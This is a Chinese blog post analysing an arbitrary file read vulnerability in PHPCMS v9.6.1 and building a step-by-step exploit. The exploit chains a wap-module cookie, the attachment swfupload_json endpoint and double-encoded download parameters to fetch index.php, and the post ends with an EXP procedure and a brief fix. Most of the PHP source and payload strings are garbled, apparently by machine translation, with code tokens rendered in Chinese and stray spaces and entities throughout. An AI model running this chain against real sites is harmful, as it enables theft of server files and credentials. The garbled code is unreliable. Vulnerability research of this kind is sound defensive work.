讲解PHPCMSv9.6.1中任意文件读取漏洞(任意文件写入漏洞)的挖掘分析过程。

PHPCMS利用教程介绍PHPCMSv9.6.1 中任意文件读取漏洞的挖掘

推荐(免费):PHPCMS教程

在网上看到了这样一个漏洞，就抽空分析了一下，得出了这个分析。

1.准备&；漏洞关键点快速扫描1.1预备知识这里对本次分析需要掌握的知识进行了梳理:

Php原生parse_str方法会自动执行一个urldecode，如果第二个参数为空，就会执行类似extract的操作。

本机空方法，用于字符串“& quot返回true。

phpcms中的Sys_auth是对称加密，在不知道auth_key的情况下，理论上不可能构造有效的密文。

1.2在diff下快速扫描v9.6.0和v9.6.1，在phpcms/modules/content/down . PHP中发现以下变化:

-a/phpcms/modules/content/down . PHP ++ b/phpcms/modules/content/down . PHP @ @-14，12 +14，16 @ @ class down { $ a _ k = sys _ auth($ a _ k，& # 39；解码& # 39；，PC _ base::load _ config(& # 39；系统& # 39；,'auth _ key & # 39));if(empty($ a _ k))show message(L(& # 39；非法参数& # 39；));unset($i，$m，$ f)；+$ a _ k = safe _ replace($ a _ k)；^m parse _ str($ a _ k)；if(isset($ I))$ I = $ id = intval($ I)；如果(！isset($ m))show message(L(& # 39；非法参数& # 39；));如果(！isset($modelid)||！isset($ catid))show message(L(& # 39；非法参数& # 39；));if(empty($ f))show message(L(& # 39；url _ invalid & # 39));$ allow _ visitor = 1；+$ id = intval($ id)；^m+ $ modelid = intval($ modelid)；^m+ $ catid = intval($ catid)；^m $ model = get cache(& # 39；型号& # 39；,'commons & # 39);$ tablename = $ this-& gt；d B- & gt；table _ name = $ this-& gt；d B- & gt；db_tablepre。$ MODEL[$ modelid][& # 39；tablename & # 39];$ this-& gt；d B- & gt；table_name = $tablename。'_ data & # 39；@@ -86，6 +90，7 @ @ class down { $ a _ k = sys _ auth($ a _ k，& # 39；解码& # 39；，$ PC _ auth _ key)；if(empty($ a _ k))show message(L(& # 39；非法参数& # 39；));unset($i，$m，$f，$t，$ IP)；+$ a _ k = safe _ replace($ a _ k)；^m parse _ str($ a _ k)；if(isset($ I))$ downid = intval($ I)；如果(！isset($ m))show message(L(& # 39；非法参数& # 39；));@@ -118，6 +123，7 @ @ class down { } $ ext = fileext($ filename)；$ filename = date(& # 39；Ymd _ his & # 39).随机(3)。'。'。$ ext+$ fileurl = str _ replace(array(& # 39；& lt','& gt'), ''，$ fileurl)；^M file_down($fileurl，$ filename)；}}主要修改了init()和download()两个方法，大胆猜测这两个函数有问题。

公共函数init(){ $ a _ k = trim($ _ GET[& # 39；a _ k & # 39]);如果(！isset($ a _ k))show message(L(& # 39；非法参数& # 39；));$a_k = sys_auth($a_k，& # 39；解码& # 39；，PC _ base::load _ config(& # 39；系统& # 39；,'auth _ key & # 39));//关键点1 if (empty ($ a _ k))显示消息(l(& # 39；非法参数& # 39；));unset($i，$m，$ f)；$ a _ k = safe _ replace($ a _ k)；//关键点2 parse _ str($ a _ k)；//关键点3 if(isset($ I))$ I = $ id = intval($ I)；如果(！isset($ m))show message(L(& # 39；非法参数& # 39；));如果(！isset($modelid)||！isset($ catid))show message(L(& # 39；非法参数& # 39；));if(empty($ f))show message(L(& # 39；url _ invalid & # 39));$ allow _ visitor = 1；$ id = intval($ id)；$ modelid = intval($ modelid)；$ catid = intval($ catid)；......if(preg _ match(& # 39；/(PHP | phtml | PHP 3 | PHP 4 | JSP | dll | ASP | cer | asa | shtml | shtm | aspx | asax | CGI | fcgi | pl)(\。| $)/I & # 39；，$f) || strpos($f，& quot:\ \ & quot)!==FALSE || strpos($f，& # 39；..')!= = FALSE)show message(L(& # 39；url _ error & # 39));//关键点4 if(strpos($f，& # 39；http://& # 39；) !== FALSE || strpos($f，& # 39；FTP://& # 39；) !== FALSE || strpos($f，& # 39；://')= = = FALSE){ $ PC _ auth _ key = MD5(PC _ base::load _ config(& # 39；系统& # 39；,'auth _ key & # 39).$ _服务器[& # 39；HTTP _ USER _ AGENT & # 39].'下来& # 39；);$ a _ k = urlencode(sys _ auth(& quot；i = $ i & ampd = $ d & amps = $ s & ampt = & quot。SYS_TIME。"& ampip = & quot。ip()。"& ampm = & quot。$ m. & quot& ampf = $ f & ampmodelid = & quot。$modelid，& # 39；编码& # 39；，$ PC _ auth _ key))；//关键点5 $ downurl = & # 39？m =内容& ampc =羽绒& ampa =下载& ampa _ k = & # 39。$ a _ k；} else { $ down URL = $ f；}}公共函数下载(){ $ a _ k = trim($ _ GET[& # 39；a _ k & # 39]);$ PC _ auth _ key = MD5(PC _ base::load _ config(& # 39；系统& # 39；,'auth _ key & # 39).$ _服务器[& # 39；HTTP _ USER _ AGENT & # 39].'下来& # 39；);//关键点6 $a_k = sys_auth($a_k，& # 39；解码& # 39；，$ PC _ auth _ key)；if(empty($ a _ k))show message(L(& # 39；非法参数& # 39；));unset($i，$m，$f，$t，$ IP)；$ a _ k = safe _ replace($ a _ k)；//关键点7 parse _ str($ a _ k)；//关键点8 if(isset($ I))$ down id = intval($ I)；如果(！isset($ m))show message(L(& # 39；非法参数& # 39；));如果(！isset($ modelid))show message(L(& # 39；非法参数& # 39；));if(empty($ f))show message(L(& # 39；url _ invalid & # 39));如果(！$ i | | $ m & lt0)show message(L(& # 39；非法参数& # 39；));如果(！isset($ t))show message(L(& # 39；非法参数& # 39；));如果(！isset($ IP))show message(L(& # 39；非法参数& # 39；));$ start time = intval($ t)；if(preg _ match(& # 39；/(PHP | phtml | PHP 3 | PHP 4 | JSP | dll | ASP | cer | asa | shtml | shtm | aspx | asax | CGI | fcgi | pl)(\。| $)/I & # 39；，$f) || strpos($f，& quot:\ \ & quot)!==FALSE || strpos($f，& # 39；..')!= = FALSE)show message(L(& # 39；url _ error & # 39));//关键点9 $ fileurl = trim($ f)；如果(！$downid || empty($fileurl) ||！preg _ match(& quot；/[0-9]{ 10 }/& quot；，$starttime) ||！preg _ match(& quot；/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1，3 }/& quot；，$ip) || $ip！= IP())show message(L(& # 39；非法参数& # 39；));$ end TIME = SYS _ TIME-$ start TIME；if($ end time & gt；3600)show message(L(& # 39；url _ invalid & # 39));if($m) $fileurl = trim($s)。trim($ fileurl)；//关键点10 if(preg _ match(& # 39；/(PHP | phtml | PHP 3 | PHP 4 | JSP | dll | ASP | cer | asa | shtml | shtm | aspx | asax | CGI | fcgi | pl)(\。| $)/I & # 39；，$ fileurl))show message(L(& # 39；url _ error & # 39));//关键点11 //远程文件if(strpos($fileurl，& # 39；:/')& amp& amp(strpos($fileurl，PC _ base::load _ config(& # 39；系统& # 39；,'上传_网址& # 39；))= = = false)){///关键点12头(& quot位置:$ fileurl & quot);} else { if($ d = = 0){ header(& quot；位置:& quot。$ fileurl)；//Key point 13 } else { $ fileurl = str _ replace(array(PC _ base::load _ config(& # 39；系统& # 39；,'上传_网址& # 39；),'/')、array(PC _ base::load _ config(& # 39；系统& # 39；,'上传路径& # 39；)、DIRECTORY_SEPARATOR)、$ fileurl)；$ filename = basename($ file URL)；//关键点14 //处理中文文件if(preg _ match(& quot；/^([\s\S]*？)([\ x8\ xfe][\ x40-\ xfe])([\ S \ S]*？)/& quot；，$ fileurl)){ $ filename = str _ replace(array(& quot；% 5C & quot，& quot% 2F & quot；，& quot% 3A & quot)，数组(& quot\ \ & quot，& quot/& quot；，& quot:& quot)、urlencode($ file URL))；$ filename = URL decode(basename($ filename))；//Key point 15 } $ ext = fileext($ filename)；//Key point 16 $ filename = date(& # 39；Ymd _ his & # 39).随机(3)。'。'。$ ext$ fileurl = str _ replace(array(& # 39；& lt','& gt'), ''，$ fileurl)；//关键点17 file_down($fileurl，$ filename)；//Key 18}}安全_替换函数如下

function safe _ replace($ string){ $ string = str _ replace(& # 39；%20',''，$ string)；$ string = str _ replace(& # 39；%27',''，$ string)；$ string = str _ replace(& # 39；%2527',''，$ string)；$ string = str _ replace(& # 39；*',''，$ string)；$ string = str _ replace(& # 39；"','& ampquot'，$ string)；$ string = str _ replace(& quot；'",''，$ string)；$ string = str _ replace(& # 39；"',''，$ string)；$ string = str _ replace(& # 39；；',''，$ string)；$ string = str _ replace(& # 39；& lt','& amplt；'，$ string)；$ string = str _ replace(& # 39；& gt','& ampgt；'，$ string)；$ string = str _ replace(& quot；{ & quot,''，$ string)；$ string = str _ replace(& # 39；}',''，$ string)；$ string = str _ replace(& # 39；\\',''，$ string)；返回$ string} 1.2内容/下降模块大致分析流程。在init方法中，根据原始的$a_k(包括file_down的文件的基本信息)，验证一次，生成并调用。

下载方法的url，url的模式是$ downurl = & # 39？m =内容& ampc =羽绒& ampa =下载& ampa _ k = & # 39。$a_k(必须满足一定条件。)

download方法接收$a_k，解码，求解文件信息，调用file_down($fileurl，$filename)(必须满足一定条件)。

我们来看看file_down函数。第一个参数$filepath是实际控制readfile的文件名的变量。readfile可以读取本地文件，所以我们可以构造一个合格的$fileurl，绕过上面的限制来完成本地文件的读取功能！

函数file_down($filepath，$ filename = & # 39'){如果(！$ filename)$ filename = basename($ file path)；if(is _ ie())$ filename = raw urlencode($ filename)；$ filetype = fileext($ filename)；$ filesize = sprintf(& quot；% u & quot，filesize($ file path))；if(ob_get_length()！= = false)@ ob _ end _ clean()；页眉(& # 39；pragma:public & # 39；);页眉(& # 39；最后修改时间:& # 39；。GM date(& # 39；d，d，M，Y，H:I:s & # 39；) .'GMT & # 39);页眉(& # 39；缓存控制:不存储，不缓存，必须重新验证& # 39；);页眉(& # 39；Cache-Control: pre-check=0，post-check=0，max-age = 0 & # 39；);页眉(& # 39；内容传输编码:二进制& # 39；);页眉(& # 39；内容编码:无& # 39；);页眉(& # 39；内容类型:& # 39；。$ filetype)；页眉(& # 39；内容-处置:依恋；filename = & quot'。$filename。'"');页眉(& # 39；内容长度:& # 39；。$ filesize)；readfile($ file path)；退出；}1.2.1$fileurl变量结构分析如果我们要读取。站点的php结束文件，php由于key point 11的存在不能出现在$fileurl中，但是我们从key point 17可以看到它已经被替换了。

$ fileurl = str _ replace(array(& # 39；& lt','& gt'), ''，$ fileurl)；//关键点17那么可以认为我们构建了一个符合。ph ([

再往上看。

if($m) $fileurl = trim($s)。trim($ fileurl)；//如果关键点10的变量$m为真，那么我们可以通过引入变量$s来构造一个$fileurl，而$fileurl是由变量$ F控制的。

$ fileurl = trim($ f)；$ a _ k = safe _ replace($ a _ k)；//关键点7 parse _ str($ a _ k)；//关键点8通过parse_str提取变量，轻松得到$ i，$ m，$ f，$ t，$ s，$ d和$ modelid的控制变量。看到这里，我们可以构造$a_k来控制这些变量。

1.2.2$a_k变量分析然后查。

$ PC _ auth _ key = MD5(PC _ base::load _ config(& # 39；系统& # 39；,'auth _ key & # 39).$ _服务器[& # 39；HTTP _ USER _ AGENT & # 39].'下来& # 39；);//关键点6 $a_k = sys_auth($a_k，& # 39；解码& # 39；，$ PC _ auth _ key)；这个关键点6很重要，因为这里的$pc_auth_key几乎不可能暴力出来。但是，只有在init()方法中使用相同的$pc_auth_key，才能获得加密的$a_k。所以只能通过init()方法构造$a_k。

现在让我们看看init方法。

$ a _ k = trim($ _ GET[& # 39；a _ k & # 39]);如果(！isset($ a _ k))show message(L(& # 39；非法参数& # 39；));$a_k = sys_auth($a_k，& # 39；解码& # 39；，PC _ base::load _ config(& # 39；系统& # 39；,'auth _ key & # 39));//关键点1这里我们可以发现sys_auth的auth其实用的是系统默认的auth_key。直觉告诉我，这可能就是问题所在。除了这个区别，init方法的其他逻辑这里就不描述了。

1.2.3总结归纳:

index.php？m =内容& ampc =羽绒& ampa = init & ampA_k=想办法构造一个合格的。

然后init方法会构造一个$a_k，可以根据下载方法解密。

通过控制$a_k，间接控制$i，$f，$m，$s，$d等变量。，该漏洞就可能被利用。

2.漏洞挖掘过程2.1 init方法接受的$a_k构造2.1.1探索正常过程中的$a_k构造过程快速扫描源代码，看哪里可以产生对init方法的调用，这其实就是常规下载模型的逻辑。

init方法的$a_k会在phpcms/modules/content/fields/downlines和phpcms/modules/content/fields/downlines中生成。

函数downfile($field，$ value){ extract(string 2 array($ this-& gt；字段[$ field][& # 39；设置& # 39；]));$ list _ str = array()；if($ value){ $ value _ arr = explode(& # 39；|'，$ value)；$ file URL = $ value _ arr[& # 39；0'];if($ file URL){ $ sel _ server = $ value _ arr[& # 39；1'] ?爆炸(& # 39；,'，$ value _ arr[& # 39；1']) : ''；$ server _ list = get cache(& # 39；下行服务器& # 39；,'commons & # 39);if(is _ array($ server _ list)){ foreach($ server _ list as $ _ k = & gt；$ _ v){ if(＄value & amp；& ampis _ array($ sel _ server)& amp；& ampin_array($_k，$ sel _ server)){ $ download URL = $ _ v[siteurl]。$ fileurlif($ download link){ $ a _ k = urlencode(sys _ auth(& quot；我= $ this-& gt；id & amps = $ _ v[siteurl]& amp；m = 1 & ampf = $ fileurl & amp下载类型& ampmodelid = $ this-& gt；模型& ampcatid = $ this-& gt；catid & quot, '编码& # 39；，PC _ base::load _ config(& # 39；系统& # 39；,'auth _ key & # 39)));$ list _ str[]= & quot；& lta href = & # 39"。APP_PATH。"index.php？m =内容& ampc =羽绒& ampa _ k = { $ a _ k } & # 39target = & # 39_ blank & # 39& gt{ $ _ v[站点名称]} & lt；/a & gt；"；} else { $ list _ str[]= & quot；& lta href = & # 39{ $ downloadurl } & # 39target = & # 39_ blank & # 39& gt{ $ _ v[站点名称]} & lt；/a & gt；"；} } } }返回$ list _ str}}}但是发现content_input和content_output中权限验证和限制的逻辑比较完善，基本不存在利用的可能。

2.1.2黑科技构造$a_k因为sys_auth是对称加密，能不能找个地方用同样的密钥生成，搜索sys_auth全文，我们来看看有没有满足以下条件的上下文。

该方式被编码。

Auth_key是系统默认，即:PC _ base::load _ config(& # 39；系统& # 39；,'auth _ key & # 39)

而且要加密的内容是可控的(可以是我们的$_REQUEST数据，也可以是构造的)。

加密的数据被回显。

总共找到58个匹配项，但是没有一个符合上下文，但是我们可以注意到。

公共静态函数set_cookie($var，$ value = & # 39'，$ time = 0){ $ time = $ time & gt；0 ?$ time:($ value = = & # 39；'？SYS _ TIME-3600:0)；$ s = $ _ SERVER[& # 39；服务器端口& # 39；] == '443'？1 : 0;$ var = PC _ base::load _ config(& # 39；系统& # 39；,'cookie _ pre & # 39).$ var$ _ COOKIE[$ var]= $ value；if(is _ array($ value)){ foreach($ value as $ k = & gt；$ v){ set cookie(＄var。'['。$ k. & # 39]'，sys_auth($v，& # 39；编码& # 39；)，$time，PC _ base::load _ config(& # 39；系统& # 39；,'cookie _ path & # 39)，PC _ base::load _ config(& # 39；系统& # 39；,'cookie _ domain & # 39)，$ s)；} } else { set cookie(＄var，sys _ auth(＄value，& # 39；编码& # 39；)，$time，PC _ base::load _ config(& # 39；系统& # 39；,'cookie _ path & # 39)，PC _ base::load _ config(& # 39；系统& # 39；,'cookie _ domain & # 39)，$ s)；} }公共静态函数get_cookie($var，$ default = & # 39'){ $ var = PC _ base::load _ config(& # 39；系统& # 39；,'cookie _ pre & # 39).$ varreturn isset($_COOKIE[$var])？sys_auth($_COOKIE[$var]，& # 39；解码& # 39；):$ default} param::set _ cookie param::get _ cookie使用默认的auth_key进行cookie加密。

立即全文搜索set_cookie，并查找满足以下条件的上下文。

set_cookie的内容是可控的。

set_cookie的触发条件应该尽量限制。

总共找到了122个匹配，并且找到了两个更好的触发点。

phpcms/modules/attachment/attachments . PHP中的Swfupload_json/swfupload_del方法和phpcms/modules/video.php中的swfupload_json/del方法。

视频模块需要管理员权限，所以不考虑。只要是注册用户就可以调用附件模块。

我们来看看swfupload_json

公共函数swfupload _ JSON(){ $ arr[& # 39；援助& # 39；]= intval($ _ GET[& # 39；援助& # 39；]);$ arr[& # 39；src & # 39]= safe _ replace(trim($ _ GET[& # 39；src & # 39]));$ arr[& # 39；文件名& # 39；]= urlencode(safe _ replace($ _ GET[& # 39；文件名& # 39；]));$ JSON _ str = JSON _ encode($ arr)；$ att _ arr _ exist = param::get _ cookie(& # 39；att _ json & # 39);$ att _ arr _ exist _ tmp = explode(& # 39；||'，$ att _ arr _ exist)；if(is _ array($ att _ arr _ exist _ tmp)& amp；& ampin_array($json_str，$ att _ arr _ exist _ tmp)){ return true；} else { $json_str = $att_arr_exist？$att_arr_exist。'||'。$ JSON _ str:$ JSON _ str；param::set _ cookie(& # 39；att _ json & # 39，$ JSON _ str)；返回true}}我们可以通过src和filename来构造。最终我选择src，最终的形式会是一个json字符串。当然，有很多会“| | & quot分裂。

在我们注册用户登录后，调用。

index.php？m =附件& ampc =附件和附件。a = swfupload _ json & ampaid = 1 & ampsrc=fobnn生成的数据将是

{ & quot援助& quot:888，& quotsrc&quot:& quotfobnn & quot，& quot文件名& quot:& quot"}然后我们在response . header[" att _ JSON & quot；]。

1 a66 lxdasytpyw 9e h6 xoxqtpetk 6x 6 z 0l 0 krq 7 _ LX 9 bekmdtq 1 xcymmmso 3m 9 vdf 5 e 6 xy 3 rjvulahkk 15 RH-cjz我们来修改下. PHP-& gt；Init方法，解码后输出$a_k。

然后我们打电话

index.php？m =内容& ampc =羽绒& ampa = init & ampa _ k = 1 a66 lxdasytpyw 9 eh 6 xoxqtpetkx 6 z 0 l 0 krq 7 _ LX 9 bekmdtq 1 xcymmso 3m 9 vdf 5 es 6y 3 r jvulak 15 RH-cjz令人振奋，init方法成功解码$ a _ k。

好了，现在我们已经验证了我们想法的可行性，是时候构建一个可用的有效载荷了。

2.2 json和parse_str目前正在尝试解决从json解析出parsing _ str并能够解析出$ i、$ m和$ f等变量的问题。

{ & quot援助& quot:888，& quotsrc&quot:& quotfobnn = q & ampp1 = 12312 & quot，& quot文件名& quot:& quot"}分析{ & quot援助& quot:888，& quotsrc&quot:& quotFobnn=q和p1 = 12312 & quot，& quot文件名& quot:& quot"}

说明parse_str还是可以解析的。只需关闭它的前后，并填写我们需要的变量，例如。

{ & quot援助& quot:888，& quotsrc&quot:& quotpad = x & ampfobnn = q & ampp1=12312。pade = & quot，& quot文件名& quot:& quot"}然后fobnn和p1正常解析，src需要URLENCODE提交，不会导致php解析错误。

2.3构造一个符合init方法的$a_k。首先，我们构造一个符合init方法的$a_k，这样就可以完成正常的过程。

if(isset($ I))$ I = $ id = intval($ I)；如果(！isset($ m))show message(L(& # 39；非法参数& # 39；));如果(！isset($modelid)||！isset($ catid))show message(L(& # 39；非法参数& # 39；));if(empty($ f))show message(L(& # 39；url _ invalid & # 39));$ allow _ visitor = 1；$ id = intval($ id)；$ modelid = intval($ modelid)；$ catid = intval($ catid)；构造pad = x &；i = 1 & ampmodelid = 1 & ampm = 1 & ampcatid = 1 & ampf = fobnn & ampPade=用于满足条件。

index.php？m =附件& ampc =附件和附件。a = swfupload _ json & ampaid = 1 src = pad % 3dx % 26i % 3d 1% 26 modeid % 3d 1% 25m % 3d 1% 26 CCA tid % 3d 1% 26f % 3 dobnn % 26 pade % 3d get。

3d 3 fr 3g 157 hoc 3 wgneqolyxvctvxf 95 vbotxfclzq 4 bbx 7j 0 lhb 7 c 6 urwbyzg 8 alwdrqp 4 mzb 761 b 1 _ zsod-adgb 2 jks 4 uvdbknvgyf P8 c 8 VP-emqkonvby 6 an H4 ffwuybrufucsvsmjq { & quot；援助& quot:1，& quotsrc&quot:& quotpad = x & ampi = 1 & ampmodelid = 1 & ampm = 1 & ampcatid = 1 & ampf = fobnn & amppade = & quot，& quot文件名& quot:& quot"}然后提交。

index.php？m =内容& ampc =羽绒& ampa = init & ampa _ k = 3d 3 fr 3g 157 hoc 3 wgneqolyxvctvxf 95 vbotxfclzq 4 bx7j 0 l HB 7 c 6 urwbyzg 8 alwdrqp 4 mzb 761 b 1 _ zsod-ADB 2 jks 4 uvdbknkvgyfp 8 c 8 PV-emqkonvby 6 Anh 4 fffwuyubufusvsmjq成功！该页面生成了一个调用下载方法的url。

& lt/head & gt；& ltbody & gt& ltstyle type = & quottext/CSS & quot；& gt正文，html{背景:#FFF！重要；} & lt/style & gt；& lta href = & quot？m =内容& ampc =羽绒& ampa =下载& ampa _ k = a 602 ecw 5t kutzttvleyrcu 0k stkdclfcnaq 06 ge 74c 9 ZC 6 nmuahass 9 zwca-glxrmbtylsbtrxmntxy 5 nsfrziec _ icrmj 3 ptsqxthxps 3 QS 4 u 6 pkliz 4y 3a & quot；class = & quotxzs _ btn & quot& gt& lt/a & gt；& lt/body & gt；& lt/html & gt；2.4绕过限制构造最终有效载荷。目前正常流程已经走完。重点是如何构造一致的$fileurl，看看init方法。

if(preg _ match(& # 39；/(PHP | phtml | PHP 3 | PHP 4 | JSP | dll | ASP | cer | asa | shtml | shtm | aspx | asax | CGI | fcgi | pl)(\。| $)/I & # 39；，$f) || strpos($f，& quot:\ \ & quot)!==FALSE || strpos($f，& # 39；..')!= = FALSE)show message(L(& # 39；url _ error & # 39));if(strpos($f，& # 39；http://& # 39；) !== FALSE || strpos($f，& # 39；FTP://& # 39；) !== FALSE || strpos($f，& # 39；://')= = = FALSE){ $ PC _ auth _ key = MD5(PC _ base::load _ config(& # 39；系统& # 39；,'auth _ key & # 39).$ _服务器[& # 39；HTTP _ USER _ AGENT & # 39].'下来& # 39；);$ a _ k = urlencode(sys _ auth(& quot；i = $ i & ampd = $ d & amps = $ s & ampt = & quot。SYS_TIME。"& ampip = & quot。ip()。"& ampm = & quot。$ m. & quot& ampf = $ f & ampmodelid = & quot。$modelid，& # 39；编码& # 39；，$ PC _ auth _ key))；$ downurl = & # 39？m =内容& ampc =羽绒& ampa =下载& ampa _ k = & # 39。$ a _ k；} else { $ down URL = $ f；对F的限制还挺多的，包括定期黑名单检测php，asp等等。也不能出现”.."，& quot:\ & quot

幸运的是，我们在下载函数中看到了这一点

if($m) $fileurl = trim($s)。trim($ fileurl)；//关键点10:我们可以通过控制$m由$s构造，而$m和$s参与$ A _ K的构造。

在init方法中，我们可以构造m = 1 &；s=。php & ampF=index为了绕过init方法的检测，我们把重点放在download方法上。

//例行检测代码就不贴了，省略$ i，$ t，$ m，$ modelid，$ t，$ ip的检测。if(preg _ match(& # 39；/(PHP | phtml | PHP 3 | PHP 4 | JSP | dll | ASP | cer | asa | shtml | shtm | aspx | asax | CGI | fcgi | pl)(\。| $)/I & # 39；，$f) || strpos($f，& quot:\ \ & quot)!==FALSE || strpos($f，& # 39；..')!= = FALSE)show message(L(& # 39；url _ error & # 39));$ fileurl = trim($ f)；通过这个结构，上面的检测肯定可以绕过，但是会发现后面的检测会出错，最后$fileurl会变成index.php。

if($m) $fileurl = trim($s)。trim($ fileurl)；if(preg _ match(& # 39；/(PHP | phtml | PHP 3 | PHP 4 | JSP | dll | ASP | cer | asa | shtml | shtm | aspx | asax | CGI | fcgi | pl)(\。| $)/I & # 39；，$ fileurl))show message(L(& # 39；url _ error & # 39));//远程文件可以在快速扫描中看到。

$ fileurl = str _ replace(array(& # 39；& lt','& gt'), ''，$ fileurl)；//重点17也看到了

if($ d = = 0){ header(& quot；位置:& quot。$ fileurl)；2.4.1 urlencode "

最终pad = x &；i = 1 & ampmodelid = 1 & ampcatid = 1 & ampd=1。m = 1 & ampf=。p & lt惠普& amps =指数& amppade=

因为safe_replce的存在，<会被过滤掉，我在之前的知识里说过，parse_str会自动编码一次。

所以它可以被建造

d=1。m = 1 & ampf=。p % 3chp & amps =指数

我们发现在init方法中，safe_replace用了一次，parse_str用了一次。

那么最终编码到下载$a_k中的数据实际上是

所以我们只需要在init方法被编码时确保它是%3c，并通过urlencode构造一次%3c。

d=1。m = 1 & ampf=。p % 253惠普& amps =指数

当然，如果要读取其他目录，也要对目录路径进行编码。

2.4.2最终有效载荷以阅读首页index.php为例。

pad = x & ampi = 1 & ampmodelid = 1 & ampcatid = 1 & ampd=1。m = 1 & ampf=。p % 253惠普& amps =指数& amppade=index.php？m =附件& ampc =附件和附件。a = swfupload _ json & ampaid = 1 & ampsrc = pad % 3dx % 26i % 3d 1% 26 modelid % 3d 1% 26 catid % 3d 1% 26d % 3d 1% 26m % 3d 1% 26f % 3d . p % 25253 chp % 26s % 3d index % 26 pade % 3d 8862 fewa 0 vodamdaewxtunq 817 najmag 9 dylumpb 8 qpbl 8 fi 91 _ xvw 8 ngzkbbjkxn 8 ms-sHcBkGNtosnd _ zjshnlyqq援助& quot:1，& quotsrc&quot:& quotpad = x & ampi = 1 & ampmodelid = 1 & ampcatid = 1 & ampd=1。m = 1 & ampf=。p % 253惠普& amps =指数& amppade = & quot，& quot文件名& quot:& quot"}index.php？m =内容& ampc =羽绒& ampa = init & ampa _ k = 8862 fewa 0 vodamdaewxtunq 817 najmag 9 dylumpb 8 qpbl 8 fi 91 _ xvw 8 ngzkbgbjkxn 8 ms-sHcBkGNtosnd _ zjshnly qvorc 2 zfmspubno 6 rdialavacchvrgttnrymaimtij 4 ovmgpwjbu 1 I 0 flmurclmfaweiqindex . PHP？m =内容& ampc =羽绒& ampa =下载& ampa _ k = e 5586 zx1k-u h8 prhk 2 zpap V5 cxlamnajy 46 mo 8 iy 7 dgyxwqwzhqfvpqjtmdmmujxrf 0 GX _ wriv-ISK Q2 z 8 yewc-LRX IR 9 egt-PAEJTGBUCCOOI 3 wlmdxajpdfuiqpsy最后提示下载文件，文件下载成功。打开后，里面确实是index.php的内容。

2.5完全无限制地使用class attachments { private $ att _ db；绕过附件模块的权限限制；function _ _ construct(){ PC _ base::load _ app _ func(& # 39；全球& # 39；);$ this-& gt；upload _ URL = PC _ base::load _ config(& # 39；系统& # 39；,'上传_网址& # 39；);$ this-& gt；upload _ path = PC _ base::load _ config(& # 39；系统& # 39；,'上传路径& # 39；);$ this-& gt；img ext = array(& # 39；jpg & # 39,'gif & # 39,'巴新& # 39；,'bmp & # 39,'jpeg & # 39);$ this-& gt；userid = $ _ SESSION[& # 39；userid & # 39] ?$ _ SESSION[& # 39；userid & # 39]:(param::get _ cookie(& # 39；_ userid & # 39) ?param::get _ cookie(& # 39；_ userid & # 39):sys _ auth($ _ POST[& # 39；userid _ flash & # 39],'解码& # 39；));$ this-& gt；is admin = $ this-& gt；admin _ username = $ _ SESSION[& # 39；roleid & # 39] ?1 : 0;$ this-& gt；groupid = param::get _ cookie(& # 39；_ groupid & # 39) ?param::get _ cookie(& # 39；_ groupid & # 39) : 8;//判断是否登录if(empty($ this->；userid)){ show message(L(& # 39；请_登录& # 39；,'','会员& # 39；));}}可以找到

sys _ auth($ _ POST[& # 39；userid _ flash & # 39],'解码& # 39；)可以控制$ this-& gt；Userid没有复杂的权限检查，默认AUTH_KEY加密。

在全文中，我发现set_cookie是没有限制的，并且发现WAP模块是可以使用的。

PC _ base::load _ sys _ class(& # 39；格式& # 39；, '', 0);类索引{ function _ _ construct(){ $ this-& gt；db = PC _ base::load _ model(& # 39；content _ model & # 39);$ this-& gt；siteid = isset($ _ GET[& # 39；siteid & # 39])& amp；& amp(intval($ _ GET[& # 39；siteid & # 39])& gt；0) ?intval(trim($ _ GET[& # 39；siteid & # 39])):(param::get _ cookie(& # 39；siteid & # 39) ?param::get _ cookie(& # 39；siteid & # 39) : 1);param::set _ cookie(& # 39；siteid & # 39，$ this-& gt；siteid)；$ this-& gt；WAP _ site = get cache(& # 39；wap _ site & # 39,'wap & # 39);$ this-& gt；types = get cache(& # 39；wap _ type & # 39,'wap & # 39);$ this-& gt；WAP = $ this-& gt；WAP _ site[$ this-& gt；siteid]；定义(& # 39；WAP _ SITEURL & # 39，$ this-& gt；WAP[& # 39；域& # 39；] ?$ this-& gt；WAP[& # 39；域& # 39；].'index.php？':APP_PATH。'index.php？m = wap & ampsiteid = & # 39。$ this-& gt；siteid)；如果($ this-& gt；WAP[& # 39；地位& # 39；]!=1)退出(L(& # 39；wap _ close _ status & # 39));}没有任何条件，我们可以$ _ GET[& # 39；siteid & # 39]来控制param::set _ cookie(& # 39；siteid & # 39，$ this-& gt；Siteid)，并且默认有WAP模块文件，但不需要打开。

3.EXP编写过程如下:

index.php？m = wap & ampc =指数& ampSiteid=1获取一个名为Siteid的cookie。

参观index.php？m =附件& ampc =附件和附件。a = swfupload _ json & amp援助=1

& ampSrc=想要读取文件的有效载荷，访问时将post字段userid_flash设置为步骤1中获取的cookie。响应成功后，获取名为att_json的cookie。

参观index.php？m =内容& ampc =羽绒& ampa = init & ampA_k=获取的att_json来构造最终的漏洞利用路径。

生成的$a_k可以直接截取。

参观index.php？m =内容& ampc =下载& ampa = init & ampA_k=截取的$ a _ k .完全利用。

4.修复方案的init方法中的$a_k加密和解密sys_auth不应使用默认密钥。

在file_down之前再次过滤$fileurl。

以上是讲解PHPCMSv9.6.1中任意文件读取漏洞挖掘分析过程的详细内容，更多请关注主机参考其他相关文章！

这几篇文章你可能也喜欢：

• 大型科技公司遭受了重大网络攻击。如何筑牢网络安全防线？（互联网巨头公司应该承担怎样的社会责任）
• 如何进行linux系统的网络安全扫描和渗透测试（Linux网络扫描工具）
• 2023年网络安全宣传周于9月11日至17日在全国范围内举行。
• 在安全的网站上安装ssl证书会安全吗(有必要安装SSL证书吗)？
• 解释PHPCMSv9.6.1中任何文件读取漏洞的挖掘和分析过程。

本文由主机参考刊发，转载请注明：讲解PHPCMSv9.6.1中任意文件读取漏洞(任意文件写入漏洞)的挖掘分析过程。 https://zhujicankao.com/93591.html